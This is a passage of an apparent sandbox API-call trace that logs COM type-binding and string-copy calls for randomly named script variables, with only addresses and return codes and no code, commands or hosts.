_Src=0x56e1532 | out: _Dst=0x87fcf50) returned 0x0 [0061.362] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080ce2, cbMultiByte=15, lpWideCharStr=0x343d54, cchWideChar=16 | out: lpWideCharStr="_B_var_XqKkudh") returned 15 [0061.363] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_XqKkudh", lHashVal=0x105d11, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.363] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e1532 | out: _Dst=0x343dbc) returned 0x0 [0061.363] CRetailMalloc_Free () returned 0x7dc0201 [0061.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1556, cbMultiByte=10, lpWideCharStr=0x343d44, cchWideChar=11 | out: lpWideCharStr="GZ73P5TpA") returned 10 [0061.363] ITypeComp:RemoteBind (in: This=0x87cef08, szName="GZ73P5TpA", lHashVal=0x103a45, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdfe | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdfe) returned 0x0 [0061.364] CRetailMalloc_Alloc () returned 0x8756fc0 [0061.364] _mbscpy_s (in: _Dst=0x8756fc0, _DstSizeInBytes=0xa, _Src=0x56e1556 | out: _Dst=0x8756fc0) returned 0x0 [0061.364] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080d0e, cbMultiByte=17, lpWideCharStr=0x343d54, cchWideChar=18 | out: lpWideCharStr="_B_var_GZ73P5TpA") returned 17 [0061.364] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_GZ73P5TpA", lHashVal=0x10438a, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.364] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e1556 | out: _Dst=0x343dbc) returned 0x0 [0061.364] CRetailMalloc_Free () returned 0x1a0a0101 [0061.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e157e, cbMultiByte=10, lpWideCharStr=0x343d44, cchWideChar=11 | out: lpWideCharStr="dlBeka7sm") returned 10 [0061.365] ITypeComp:RemoteBind (in: This=0x87cef08, szName="dlBeka7sm", lHashVal=0x10c055, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xe00 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xe00) returned 0x0 [0061.365] CRetailMalloc_Alloc () returned 0x8756fc0 [0061.365] _mbscpy_s (in: _Dst=0x8756fc0, _DstSizeInBytes=0xa, _Src=0x56e157e | out: _Dst=0x8756fc0) returned 0x0 [0061.366] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080d3e, cbMultiByte=17, lpWideCharStr=0x343d54, cchWideChar=18 | out: lpWideCharStr="_B_var_dlBeka7sm") returned 17 [0061.366] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_dlBeka7sm", lHashVal=0x10c99a, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.366] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e157e | out: _Dst=0x343dbc) returned 0x0 [0061.367] CRetailMalloc_Free () returned 0x1a0a0101 [0061.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e15a6, cbMultiByte=9, lpWideCharStr=0x343d44, cchWideChar=10 | out: lpWideCharStr="Gxt9IX5o") returned 9 [0061.368] ITypeComp:RemoteBind (in: This=0x87cef08, szName="Gxt9IX5o", lHashVal=0x10d355, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xe02 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xe02) returned 0x0 [0061.368] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.368] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e15a6 | out: _Dst=0x87fcf50) returned 0x0 [0061.369] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080d6e, cbMultiByte=16, lpWideCharStr=0x343d54, cchWideChar=17 | out: lpWideCharStr="_B_var_Gxt9IX5o") returned 16 [0061.369] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_Gxt9IX5o", lHashVal=0x10aade, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.369] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e15a6 | out: _Dst=0x343dbc) returned 0x0 [0061.369] CRetailMalloc_Free () returned 0x7dc0201 [0061.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e15ce, cbMultiByte=6, lpWideCharStr=0x343d44, cchWideChar=7 | out: lpWideCharStr="kiV5t") returned 6 [0061.370] ITypeComp:RemoteBind (in: This=0x87cef08, szName="kiV5t", lHashVal=0x106526, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xe04 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xe04) returned 0x0 [0061.370] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.370] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e15ce | out: _Dst=0x87fcf50) returned 0x0 [0061.371] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080d9a, cbMultiByte=13, lpWideCharStr=0x343d54, cchWideChar=14 | out: lpWideCharStr="_B_var_kiV5t") returned 13 [0061.371] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_kiV5t", lHashVal=0x102913, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.371] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e15ce | out: _Dst=0x343dbc) returned 0x0 [0061.371] CRetailMalloc_Free () returned 0x7dc0201 [0061.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1616, cbMultiByte=6, lpWideCharStr=0x343d44, cchWideChar=7 | out: lpWideCharStr="jDwCM") returned 6 [0061.372] ITypeComp:RemoteBind (in: This=0x87cef08, szName="jDwCM", lHashVal=0x10f902, wFlags=0x3, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xe08 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xe08) returned 0x0 [0061.372] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.372] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e1616 | out: _Dst=0x87fcf50) returned 0x0 [0061.407] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080dc6, cbMultiByte=13, lpWideCharStr=0x343d54, cchWideChar=14 | out: lpWideCharStr="_B_var_jDwCM") returned 13 [0061.407] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_jDwCM", lHashVal=0x10bcef, wFlags=0x3, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.407] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e1616 | out: _Dst=0x343dbc) returned 0x0 [0061.407] CRetailMalloc_Free () returned 0x7dc0201 [0061.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e15f2, cbMultiByte=6, lpWideCharStr=0x343d44, cchWideChar=7 | out: lpWideCharStr="ZGk6X") returned 6 [0061.408] ITypeComp:RemoteBind (in: This=0x87cef08, szName="ZGk6X", lHashVal=0x102bcc, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xe06 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xe06) returned 0x0 [0061.408] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.408] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e15f2 | out: _Dst=0x87fcf50) returned 0x0 [0061.409] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080df2, cbMultiByte=13, lpWideCharStr=0x343d54, cchWideChar=14 | out: lpWideCharStr="_B_var_ZGk6X") returned 13 [0061.409] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_ZGk6X", lHashVal=0x10eff8, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.409] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e15f2 | out: _Dst=0x343dbc) returned 0x0 [0061.409] CRetailMalloc_Free () returned 0x7dc0201 [0061.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e163a, cbMultiByte=9, lpWideCharStr=0x343d44, cchWideChar=10 | out: lpWideCharStr="FAGuxoNH") returned 9 [0061.410] ITypeComp:RemoteBind (in: This=0x87cef08, szName="FAGuxoNH", lHashVal=0x10761f, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xe0a | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xe0a) returned 0x0 [0061.410] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.410] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e163a | out: _Dst=0x87fcf50) returned 0x0 [0061.410] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080e1e, cbMultiByte=16, lpWideCharStr=0x343d54, cchWideChar=17 | out: lpWideCharStr="_B_var_FAGuxoNH") returned 16 [0061.411] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_FAGuxoNH", lHashVal=0x104da8, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.411] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e163a | out: _Dst=0x343dbc) returned 0x0 [0061.411] CRetailMalloc_Free () returned 0x7dc0201 [0061.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1662, cbMultiByte=6, lpWideCharStr=0x343d44, cchWideChar=7 | out: lpWideCharStr="j80N3") returned 6 [0061.412] ITypeComp:RemoteBind (in: This=0x87cef08, szName="j80N3", lHashVal=0x10eb63, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xe0c | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xe0c) returned 0x0 [0061.412] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.412] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e1662 | out: _Dst=0x87fcf50) returned 0x0 [0061.412] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080e4a, cbMultiByte=13, lpWideCharStr=0x343d54, cchWideChar=14 | out: lpWideCharStr="_B_var_j80N3") returned 13 [0061.412] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_j80N3", lHashVal=0x10af50, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.413] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e1662 | out: _Dst=0x343dbc) returned 0x0 [0061.413] CRetailMalloc_Free () returned 0x7dc0201 [0061.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1686, cbMultiByte=9, lpWideCharStr=0x343d44, cchWideChar=10 | out: lpWideCharStr="SBXbn1la") returned 9 [0061.413] ITypeComp:RemoteBind (in: This=0x87cef08, szName="SBXbn1la", lHashVal=0x10fb62, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xe0e | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xe0e) returned 0x0 [0061.413] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.413] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e1686 | out: _Dst=0x87fcf50) returned 0x0 [0061.414] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080e76, cbMultiByte=16, lpWideCharStr=0x343d54, cchWideChar=17 | out: lpWideCharStr="_B_var_SBXbn1la") returned 16 [0061.414] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_SBXbn1la", lHashVal=0x10d2eb, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.414] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e1686 | out: _Dst=0x343dbc) returned 0x0 [0061.414] CRetailMalloc_Free () returned 0x7dc0201 [0061.414] _mbscpy_s (in: _Dst=0x8756fc0, _DstSizeInBytes=0xa, _Src=0x56e16ae | out: _Dst=0x8756fc0) returned 0x0 [0061.415] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e16ae | out: _Dst=0x343dbc) returned 0x0 [0061.415] CRetailMalloc_Free () returned 0x1a0a0101 [0061.415] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e16fe | out: _Dst=0x87fcf50) returned 0x0 [0061.415] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e16fe | out: _Dst=0x343dbc) returned 0x0 [0061.415] CRetailMalloc_Free () returned 0x7dc0201 [0061.416] _mbscpy_s (in: _Dst=0x8756fc0, _DstSizeInBytes=0xa, _Src=0x56e16d6 | out: _Dst=0x8756fc0) returned 0x0 [0061.416] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e16d6 | out: _Dst=0x343dbc) returned 0x0 [0061.416] CRetailMalloc_Free () returned 0x1a0a0101 [0061.416] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e1722 | out: _Dst=0x87fcf50) returned 0x0 [0061.416] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e1722 | out: _Dst=0x343dbc) returned 0x0 [0061.416] CRetailMalloc_Free () returned 0x7dc0201 [0061.417] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e174a | out: _Dst=0x87fcf50) returned 0x0 [0061.417] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e174a | out: _Dst=0x343dbc) returned 0x0 [0061.417] CRetailMalloc_Free () returned 0x7dc0201 [0061.417] _mbscpy_s (in: _Dst=0x8756fc0, _DstSizeInBytes=0xa, _Src=0x56e176e | out: _Dst=0x8756fc0) returned 0x0 [0061.418] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e176e | out: _Dst=0x343dbc) returned 0x0 [0061.418] CRetailMalloc_Free () returned 0x1a0a0101 [0061.419] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e1796 | out: _Dst=0x87fcf50) returned 0x0 [0061.419] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e1796 | out: _Dst=0x343dbc) returned 0x0 [0061.419] CRetailMalloc_Free () returned 0x7dc0201 [0061.419] _mbscpy_s (in: _Dst=0x8756fc0, _DstSizeInBytes=0xa, _Src=0x56e17ba | out: _Dst=0x8756fc0) returned 0x0 [0061.419] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e17ba | out: _Dst=0x343dbc) returned 0x0 [0061.419] CRetailMalloc_Free () returned 0x1a0a0101 [0061.420] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e17e2 | out: _Dst=0x87fcf50) returned 0x0 [0061.420] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e17e2 | out: _Dst=0x343dbc) returned 0x0 [0061.420] CRetailMalloc_Free () returned 0x7dc0201 [0061.420] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e180a | out: _Dst=0x87fcf50) returned 0x0 [0061.420] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e180a | out: _Dst=0x343dbc) returned 0x0 [0061.420] CRetailMalloc_Free () returned 0x7dc0201 [0061.421] _mbscpy_s (in: _Dst=0x8756fc0, _DstSizeInBytes=0xa, _Src=0x56e1832 | out: _Dst=0x8756fc0) returned 0x0 [0061.421] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e1832 | out: _Dst=0x343dbc) returned 0x0 [0061.421] CRetailMalloc_Free () returned 0x1a0a0101 [0061.421] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e185a | out: _Dst=0x87fcf50) returned 0x0 [0061.421] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e185a | out: _Dst=0x343dbc) returned 0x0 [0061.421] CRetailMalloc_Free () returned 0x7dc0201 [0061.421] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e1882 | out: _Dst=0x87fcf50) returned 0x0 [0061.421] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e1882 | out: _Dst=0x343dbc) returned 0x0 [0061.421] CRetailMalloc_Free () returned 0x7dc0201 [0061.422] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e18a6 | out: _Dst=0x87fcf50) returned 0x0 [0061.422] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e18a6 | out: _Dst=0x343dbc) returned 0x0 [0061.422] CRetailMalloc_Free () returned 0x7dc0201 [0061.422] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e18ca | out: _Dst=0x87fcf50) returned 0x0 [0061.422] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e18ca | out: _Dst=0x343dbc) returned 0x0 [0061.423] CRetailMalloc_Free () returned 0x7dc0201 [0061.423] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e18f2 | out: _Dst=0x87fcf50) returned 0x0 [0061.423] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e18f2 | out: _Dst=0x343dbc) returned 0x0 [0061.423] CRetailMalloc_Free () returned 0x7dc0201 [0061.423] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e191a | out: _Dst=0x87fcf50) returned 0x0 [0061.423] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e191a | out: _Dst=0x343dbc) returned 0x0 [0061.423] CRetailMalloc_Free () returned 0x7dc0201 [0061.424] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e1942 | out: _Dst=0x87fcf50) returned 0x0 [0061.424] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e1942 | out: _Dst=0x343dbc) returned 0x0 [0061.424] CRetailMalloc_Free () returned 0x7dc0201 [0061.424] CRetailMalloc_Realloc () returned 0x88063b0 [0061.424] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e1966 | out: _Dst=0x87fcf50) returned 0x0 [0061.424] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e1966 | out: _Dst=0x343dbc) returned 0x0 [0061.424] CRetailMalloc_Free () returned 0x7dc0201 [0061.425] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e198a | out: _Dst=0x87fcf50) returned 0x0 [0061.425] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e198a | out: _Dst=0x343dbc) returned 0x0 [0061.425] CRetailMalloc_Free () returned 0x7dc0201 [0061.425] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e19ae | out: _Dst=0x87fcf50) returned 0x0 [0061.425] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e19ae | out: _Dst=0x343dbc) returned 0x0 [0061.425] CRetailMalloc_Realloc () returned 0x7426110 [0061.425] CRetailMalloc_Free () returned 0x7dc0201 [0061.426] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x9, _Src=0x56e19d2 | out: _Dst=0x87fcf50) returned 0x0 [0061.426] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x9, _Src=0x56e19d2 | out: _Dst=0x343dbc) returned 0x0 [0061.426] CRetailMalloc_Free () returned 0x7dc0201 [0061.426] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e19fa | out: _Dst=0x87fcf50) returned 0x0 [0061.426] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e19fa | out: _Dst=0x343dbc) returned 0x0 [0061.426] CRetailMalloc_Free () returned 0x7dc0201 [0061.427] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56e1a1e | out: _Dst=0x87504e0) returned 0x0 [0061.427] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e1a1e | out: _Dst=0x343dbc) returned 0x0 [0061.427] CRetailMalloc_Free () returned 0x1a060101 [0061.427] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e1a46 | out: _Dst=0x87fcf50) returned 0x0 [0061.427] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e1a46 | out: _Dst=0x343dbc) returned 0x0 [0061.427] CRetailMalloc_Free () returned 0x7dc0201 [0061.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1a6a, cbMultiByte=7, lpWideCharStr=0x343d44, cchWideChar=8 | out: lpWideCharStr="Kw5kYC") returned 7 [0061.428] ITypeComp:RemoteBind (in: This=0x87ce890, szName="Kw5kYC", lHashVal=0x1025a6, wFlags=0x3, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x0, pDummy=0xe42 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x0, pDummy=0xe42) returned 0x0 [0061.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1a6a, cbMultiByte=7, lpWideCharStr=0x343d44, cchWideChar=8 | out: lpWideCharStr="Kw5kYC") returned 7 [0061.428] ITypeComp:RemoteBind (in: This=0x87ce668, szName="Kw5kYC", lHashVal=0x1025a6, wFlags=0x3, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x1, pDummy=0xe42 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x1, pDummy=0xe42) returned 0x0 [0061.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1a6a, cbMultiByte=7, lpWideCharStr=0x343d44, cchWideChar=8 | out: lpWideCharStr="Kw5kYC") returned 7 [0061.428] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="Kw5kYC", lHashVal=0x1025a6, wFlags=0x3, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x2, pDummy=0xe42 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x2, pDummy=0xe42) returned 0x0 [0061.428] _mbscpy_s (in: 